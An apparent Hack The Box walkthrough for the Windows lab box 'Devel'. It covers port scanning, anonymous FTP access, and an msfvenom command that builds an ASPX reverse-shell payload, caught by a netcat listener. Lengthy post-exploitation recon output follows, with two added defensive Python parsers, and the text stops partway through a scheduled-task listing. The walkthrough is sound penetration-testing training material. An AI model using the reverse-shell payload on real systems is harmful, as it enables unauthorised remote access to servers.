Hack The Box - Devel

Box Details

Devel

OS DIFFICULTY POINTS
Windows EASY 20

ENUMERATION

Initial Port Scanning

masscan

COMMAND


masscan -p1-65535,U:1-65535 10.10.10.5 --rate=1000 -e tun0 -oG masscan-Blue

RESULT


# Masscan 1.0.5 scan initiated Tue Sep 10 14:08:54 2019
# Ports scanned: TCP(65535;1-65535,) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.10.10.5 ()     Ports: 80/open/tcp////
Host: 10.10.10.5 ()     Ports: 21/open/tcp////
# Masscan done at Tue Sep 10 14:12:36 2019

nmap

Ports for nmap scanning:

  • 80
  • 21

COMMAND


nmap -sC -sV -p80,21 -oA nmap-Devel 10.10.10.5

RESULT

Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-10 15:13 BST
Nmap scan report for 10.10.10.5
Host is up (0.039s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.54 seconds
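
The scan above is worth reading from the defender's side: the anonymous FTP listing contains the files IIS puts in its default site root, on a host that also serves IIS on port 80. The following is an added example (not part of the original write-up) that parses this nmap output and flags that combination; the finding names and helper functions are hypothetical, and the input is an excerpt of the result shown above.

```python
import re

# Entries commonly found in the root of the IIS 7.x Default Web Site.
IIS_DEFAULT_ROOT = {"iisstart.htm", "welcome.png", "aspnet_client"}

# Excerpt of the nmap result shown above.
NMAP_OUTPUT = """\
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# A script header is "| name: value" or "|_name: value"; listing lines
# such as "| 03-18-17  02:06AM ..." do not match because the first token
# is not immediately followed by a colon.
SCRIPT_RE = re.compile(r"^\|[_ ]?([a-z][a-z0-9-]*): ?(.*)$")
# Windows (DOS-style) FTP directory listing entry.
DOS_LIST_RE = re.compile(r"(\d\d-\d\d-\d\d)\s+(\d\d:\d\d[AP]M)\s+(<DIR>|\d+)\s+(.+)$")


def parse_ports(text):
    """Return one dict per port line, with NSE script output grouped by script."""
    ports, current, script = [], None, None
    for raw in text.splitlines():
        line = raw.rstrip()
        m = PORT_RE.match(line)
        if m:
            current = {"port": int(m.group(1)), "proto": m.group(2),
                       "state": m.group(3), "service": m.group(4),
                       "version": m.group(5), "scripts": {}}
            ports.append(current)
            script = None
            continue
        if current is None or not line.startswith("|"):
            continue
        m = SCRIPT_RE.match(line)
        if m:
            script = m.group(1)
            current["scripts"][script] = [m.group(2)] if m.group(2) else []
        elif script:
            # Continuation line: drop the leading "| " or "|_" marker.
            current["scripts"][script].append(line[2:].strip())
    return ports


def ftp_listing(port):
    """Names of the entries shown in the ftp-anon directory listing."""
    names = set()
    for entry in port["scripts"].get("ftp-anon", []):
        m = DOS_LIST_RE.match(entry)
        if m:
            names.add(m.group(4).strip())
    return names


def triage(text):
    """Return (port, finding) tuples for the exposures visible in the scan."""
    ports = parse_ports(text)
    iis_http = [p["port"] for p in ports
                if p["state"] == "open" and "IIS" in p["version"]]
    findings = []
    for p in ports:
        anon = p["scripts"].get("ftp-anon", [])
        if any("Anonymous FTP login allowed" in line for line in anon):
            findings.append((p["port"], "anonymous-ftp"))
            # Same host serves IIS and the FTP root holds IIS site files:
            # the FTP site is very likely rooted in the web content directory.
            if iis_http and IIS_DEFAULT_ROOT & ftp_listing(p):
                findings.append((p["port"], "ftp-root-is-web-root"))
        if "TRACE" in " ".join(p["scripts"].get("http-methods", [])):
            findings.append((p["port"], "http-trace-enabled"))
    return findings


if __name__ == "__main__":
    for port, finding in triage(NMAP_OUTPUT):
        print(port, finding)
```

A host that reports ftp-root-is-web-root should have anonymous authentication disabled on the FTP site or the FTP root moved out of the web content directory.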

Discovery

FTP

COMMAND


ftp 10.10.10.5

RESULT

Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: <password>
230 User logged in.
Remote system type is Windows_NT.
ftp> 

EXPLOITS

Exploit Search

COMMAND

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.10 LPORT=8515 -f aspx > revshell.aspx

NOTE: Because we are going to use netcat to listen for the reverse shell, we must use the stageless payload windows/shell_reverse_tcp and not the staged windows/shell/reverse_tcp.

RESULT


#  nc -lvvp 8515
listening on [any] 8515 ...
10.10.10.5: inverse host lookup failed: Unknown host
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.5] 49166
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\web

POST EXPLOIT DISCOVERY

System Information


c:\windows\system32\inetsrv>systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7600 N/A Build 7600

Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:   
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, 4:17:31 
System Boot Time:          13/9/2019, 5:50:51 
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.023 MB
Available Physical Memory: 804 MB
Virtual Memory: Max Size:  2.047 MB
Virtual Memory: Available: 1.542 MB
Virtual Memory: In Use:    505 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.5


Hostname

c:\windows\system32\inetsrv>hostname
hostname
devel

Users

c:\windows\system32\inetsrv>echo %username%
echo %username%
DEVEL$

c:\windows\system32\inetsrv>net users
net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator            babis                    Guest                    
The command completed with one or more errors.

Network Information


c:\windows\system32\inetsrv>ipconfig /all

ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : devel
   Primary Dns Suffix  . . . . . . . :
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   Physical Address. . . . . . . . . : 00-50-56-B9-C8-4B
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   IPv4 Address. . . . . . . . . . . : 10.10.10.5(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2
   DNS Servers . . . . . . . . . . . : 10.10.10.2
                                       8.8.8.8
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter isatap.{024DBC4C-1BA9-4DFC-8341-2C35AB1DF869}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Tunnel adapter Local Area Connection* 9:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

c:\windows\system32\inetsrv>route print
route print
===========================================================================
Interface List
 11...00 50 56 b9 c8 4b ......Intel(R) PRO/1000 MT Network Connection
  1...........................Software Loopback Interface 1
 12...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter
 13...00 00 00 00 00 00 00 e0 Teredo Tunneling Pseudo-Interface
===========================================================================

IPv4 Route Table
===========================================================================
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0       10.10.10.2       10.10.10.5    266
       10.10.10.0    255.255.255.0         On-link        10.10.10.5    266
       10.10.10.5  255.255.255.255         On-link        10.10.10.5    266
     10.10.10.255  255.255.255.255         On-link        10.10.10.5    266
        127.0.0.0        255.0.0.0         On-link         127.0.0.1    306
        127.0.0.1  255.255.255.255         On-link         127.0.0.1    306
  127.255.255.255  255.255.255.255         On-link         127.0.0.1    306
        224.0.0.0        240.0.0.0         On-link         127.0.0.1    306
        224.0.0.0        240.0.0.0         On-link        10.10.10.5    266
  255.255.255.255  255.255.255.255         On-link         127.0.0.1    306
  255.255.255.255  255.255.255.255         On-link        10.10.10.5    266
===========================================================================
Persistent Routes:
  Network Address          Netmask  Gateway Address  Metric
          0.0.0.0          0.0.0.0       10.10.10.2  Default
===========================================================================

IPv6 Route Table
===========================================================================
Active Routes:
 If Metric Network Destination      Gateway
  1    306 ::1/128                  On-link
  1    306 ff00::/8                 On-link
===========================================================================
Persistent Routes:
  None

c:\windows\system32\inetsrv>arp -A
arp -A

Interface: 10.10.10.5 --- 0xb
  Internet Address      Physical Address      Type
  10.10.10.2            00-50-56-b9-c8-cd     dynamic
  10.10.10.255          ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
  224.0.0.252           01-00-5e-00-00-fc     static

c:\windows\system32\inetsrv>netstat -ano
netstat -ano

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING       1424
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       672
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5357           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING       384
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING       724
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING       888
  TCP    0.0.0.0:49155          0.0.0.0:0              LISTENING       488
  TCP    0.0.0.0:49156          0.0.0.0:0              LISTENING       496
  TCP    10.10.10.5:139         0.0.0.0:0              LISTENING       4
  TCP    10.10.10.5:49166       10.10.14.10:8515       ESTABLISHED     3228
  TCP    [::]:21                [::]:0                 LISTENING       1424
  TCP    [::]:80                [::]:0                 LISTENING       4
  TCP    [::]:135               [::]:0                 LISTENING       672
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:5357              [::]:0                 LISTENING       4
  TCP    [::]:49152             [::]:0                 LISTENING       384
  TCP    [::]:49153             [::]:0                 LISTENING       724
  TCP    [::]:49154             [::]:0                 LISTENING       888
  TCP    [::]:49155             [::]:0                 LISTENING       488
  TCP    [::]:49156             [::]:0                 LISTENING       496
  UDP    0.0.0.0:123            *:*                                    1000
  UDP    0.0.0.0:3702           *:*                                    1392
  UDP    0.0.0.0:3702           *:*                                    1392
  UDP    0.0.0.0:5355           *:*                                    1072
  UDP    0.0.0.0:52626          *:*                                    1392
  UDP    10.10.10.5:137         *:*                                    4
  UDP    10.10.10.5:138         *:*                                    4
  UDP    [::]:123               *:*                                    1000
  UDP    [::]:3702              *:*                                    1392
  UDP    [::]:3702              *:*                                    1392
  UDP    [::]:52627             *:*                                    1392
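
The netstat output above is also what an incident responder would see on this host: among the listeners there is one ESTABLISHED session that the server itself opened to an address outside its subnet. The following is an added example (not part of the original write-up) that picks such sessions out of `netstat -ano` output; the function names are hypothetical, the local subnet is taken from the ipconfig output above, and the last sample row is constructed to show an ordinary inbound web session that must not be flagged.

```python
import ipaddress

# Local subnet of the host, from the ipconfig output above.
LOCAL_NET = ipaddress.ip_interface("10.10.10.5/255.255.255.0").network

# Rows taken from the netstat output above, plus one constructed row
# (the final TCP line) representing a normal inbound HTTP session.
NETSTAT_EXCERPT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING       1424
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING       384
  TCP    10.10.10.5:139         0.0.0.0:0              LISTENING       4
  TCP    10.10.10.5:49166       10.10.14.10:8515       ESTABLISHED     3228
  TCP    [::]:80                [::]:0                 LISTENING       4
  UDP    0.0.0.0:123            *:*                                    1000
  TCP    10.10.10.5:80          10.10.14.10:51234      ESTABLISHED     4
"""


def split_endpoint(endpoint):
    """Split 'host:port' or '[v6]:port' into (host, port)."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), int(port)


def parse_tcp(text):
    """Parse the TCP rows of `netstat -ano`; UDP rows and headers are skipped."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 5 or fields[0] != "TCP":
            continue
        lhost, lport = split_endpoint(fields[1])
        rhost, rport = split_endpoint(fields[2])
        rows.append({"lhost": lhost, "lport": lport, "rhost": rhost,
                     "rport": rport, "state": fields[3], "pid": int(fields[4])})
    return rows


def outbound_external(text, local_net=LOCAL_NET):
    """ESTABLISHED sessions opened by this host to an address off its subnet.

    A session whose local port is one of the host's listening ports is a
    client connecting in, so it is skipped. Anything else was initiated
    locally; on a server that should only answer requests, those deserve
    a look when the peer is outside the local network.
    """
    rows = parse_tcp(text)
    listening = {r["lport"] for r in rows if r["state"] == "LISTENING"}
    hits = []
    for r in rows:
        if r["state"] != "ESTABLISHED" or r["lport"] in listening:
            continue
        if ipaddress.ip_address(r["rhost"]) in local_net:
            continue
        hits.append({"pid": r["pid"],
                     "local": f'{r["lhost"]}:{r["lport"]}',
                     "remote": f'{r["rhost"]}:{r["rport"]}'})
    return hits


if __name__ == "__main__":
    for hit in outbound_external(NETSTAT_EXCERPT):
        print(hit)
```

The PID it reports can then be resolved to a process on the host with `tasklist /FI "PID eq 3228"`.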

c:\windows\system32\inetsrv>netsh firewall show state
netsh firewall show state

Firewall status:
-------------------------------------------------------------------
Profile                           = Standard
Operational mode                  = Enable
Exception mode                    = Enable
Multicast/broadcast response mode = Enable
Notification mode                 = Enable
Group policy version              = Windows Firewall
Remote admin mode                 = Disable

Ports currently open on all network interfaces:
Port   Protocol  Version  Program
-------------------------------------------------------------------
No ports are currently open on all network interfaces.

IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at http://go.microsoft.com/fwlink/?linkid=121488 .



c:\windows\system32\inetsrv> netsh firewall show config
 netsh firewall show config

Domain profile configuration:
-------------------------------------------------------------------
Operational mode                  = Enable
Exception mode                    = Enable
Multicast/broadcast response mode = Enable
Notification mode                 = Enable

Allowed programs configuration for Domain profile:
Mode     Traffic direction    Name / Program
-------------------------------------------------------------------

Port configuration for Domain profile:
Port   Protocol  Mode    Traffic direction     Name
-------------------------------------------------------------------

ICMP configuration for Domain profile:
Mode     Type  Description
-------------------------------------------------------------------
Enable   2     Allow outbound packet too big

Standard profile configuration (current):
-------------------------------------------------------------------
Operational mode                  = Enable
Exception mode                    = Enable
Multicast/broadcast response mode = Enable
Notification mode                 = Enable

Service configuration for Standard profile:
Mode     Customized  Name
-------------------------------------------------------------------
Enable   No          Network Discovery

Allowed programs configuration for Standard profile:
Mode     Traffic direction    Name / Program
-------------------------------------------------------------------

Port configuration for Standard profile:
Port   Protocol  Mode    Traffic direction     Name
-------------------------------------------------------------------

ICMP configuration for Standard profile:
Mode     Type  Description
-------------------------------------------------------------------
Enable   2     Allow outbound packet too big

Log configuration:
-------------------------------------------------------------------
File location   = C:\Windows\system32\LogFiles\Firewall\pfirewall.log
Max file size   = 4096 KB
Dropped packets = Disable
Connections     = Disable

IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at http://go.microsoft.com/fwlink/?linkid=121488 .

Investigate Running Services

c:\windows\system32\inetsrv>schtasks /query /fo LIST /v
schtasks /query /fo LIST /v

Folder: \
INFO: There are no scheduled tasks presently available at your access level.

Folder: \Microsoft
INFO: There are no scheduled tasks presently available at your access level.

Folder: \Microsoft\Windows
INFO: There are no scheduled tasks presently available at your access level.

Folder: \Microsoft\Windows\Active Directory Rights Management Services Client
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Automated)
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Updates the AD RMS rights policy templates for the user. This job does not provide a credential prompt if authentication to the template distribution web service on the server fails. In this case, it fails silently.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Everyone
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 01:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Daily
Start Time:                           3:00:00
Start Date:                           9/11/2006
End Date:                             N/A
Days:                                 Every 1 day(s)
Months:                               N/A
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Automated)
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Updates the AD RMS rights policy templates for the user. This job does not provide a credential prompt if authentication to the template distribution web service on the server fails. In this case, it fails silently.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Everyone
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 01:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Manual)
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Updates the AD RMS rights policy templates for the user. This job provides a credential prompt if authentication to the template distribution web service on the server fails.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          Everyone
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 01:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Autochk
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Autochk\Proxy
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        13/9/2019 6:21:07
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations
Start In:                             N/A
Comment:                              This task collects and uploads autochk SQM data if opted-in to the Microsoft Customer Experience Improvement Program.
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 10 minutes, If Not Idle Retry For 525600 minutes
Power Management:
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At system start up
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Customer Experience Improvement Program
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Customer Experience Improvement Program\Consolidator
Next Run Time:                        14/9/2019 8:00:00
Status:                               Could not start
Logon Mode:                           Interactive/Background
Last Run Time:                        14/9/2019 2:00:00
Last Result:                          -2147479295
Author:                               Microsoft Corporation
Task To Run:                          %SystemRoot%\System32\wsqmcons.exe
Start In:                             N/A
Comment:                              If the user has consented to participate in the Windows Customer Experience Improvement Program, this job collects and sends usage data to Microsoft.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        One Time Only, Hourly
Start Time:                           12:00:00
Start Date:                           2/1/2004
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        19 Hour(s), 0 Minute(s)
Repeat: Until: Time:                  None
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask
Next Run Time:                        19/9/2019 3:30:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        13/9/2019 6:08:36
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              The Kernel CEIP (Customer Experience Improvement Program) task collects additional information about the system and sends this data to Microsoft.  If the user has not consented to participate in Windows CEIP, this task does nothing.
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 3 minutes, If Not Idle Retry For 1020 minutes
Power Management:                     No Start On Batteries
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Weekly
Start Time:                           3:30:00
Start Date:                           1/9/2008
End Date:                             N/A
Days:                                 THU
Months:                               Every 1 week(s)
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Customer Experience Improvement Program\UsbCeip
Next Run Time:                        16/9/2019 1:30:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        13/9/2019 5:57:06
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              The USB CEIP (Customer Experience Improvement Program) task collects Universal Serial Bus related statistics and information about your machine and sends it to the Windows Device Connectivity engineering group at Microsoft.  The information received is
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Daily
Start Time:                           1:30:00
Start Date:                           25/4/2008
End Date:                             N/A
Days:                                 Every 3 day(s)
Months:                               N/A
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

Folder: \Microsoft\Windows\Defrag
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Defrag\ScheduledDefrag
Next Run Time:                        18/9/2019 1:38:42
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        13/9/2019 6:08:36
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\defrag.exe -c
Start In:                             N/A
Comment:                              This task defragments the computers hard disk drives.
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 3 minutes, If Not Idle Retry For 10080 minutes Stop the task if Idle State end
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Weekly
Start Time:                           1:00:00
Start Date:                           1/1/2005
End Date:                             N/A
Days:                                 WED
Months:                               Every 1 week(s)
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

Folder: \Microsoft\Windows\Diagnosis
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Diagnosis\Scheduled
Next Run Time:                        15/9/2019 1:00:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        17/3/2017 5:45:40
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              The Windows Scheduled Maintenance Task performs periodic maintenance of the computer system by fixing problems automatically or reporting them through the Action Center.
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 10 minutes, If Not Idle Retry For 480 minutes
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          INTERACTIVE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Weekly
Start Time:                           1:00:00
Start Date:                           1/1/2004
End Date:                             N/A
Days:                                 SUN
Months:                               Every 1 week(s)
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

Folder: \Microsoft\Windows\DiskDiagnostic
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector
Next Run Time:                        22/9/2019 1:00:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        13/9/2019 5:57:06
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART
Start In:                             N/A
Comment:                              The Windows Disk Diagnostic reports general disk and system information to Microsoft for users participating in the Customer Experience Program.
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for  minutes, If Not Idle Retry For  minutes
Power Management:                     No Start On Batteries
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Weekly
Start Time:                           1:00:00
Start Date:                           1/1/2004
End Date:                             N/A
Days:                                 SUN
Months:                               Every 2 week(s)
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\DFDWiz.exe
Start In:                             N/A
Comment:                              The Microsoft-Windows-DiskDiagnosticResolver warns users about faults reported by hard disks that support the Self Monitoring and Reporting Technology (S.M.A.R.T.) standard. This task is triggered automatically by the Diagnostic Policy Service when a S.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Location
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Location\Notifications
Next Run Time:                        N/A
Status:                               Ready
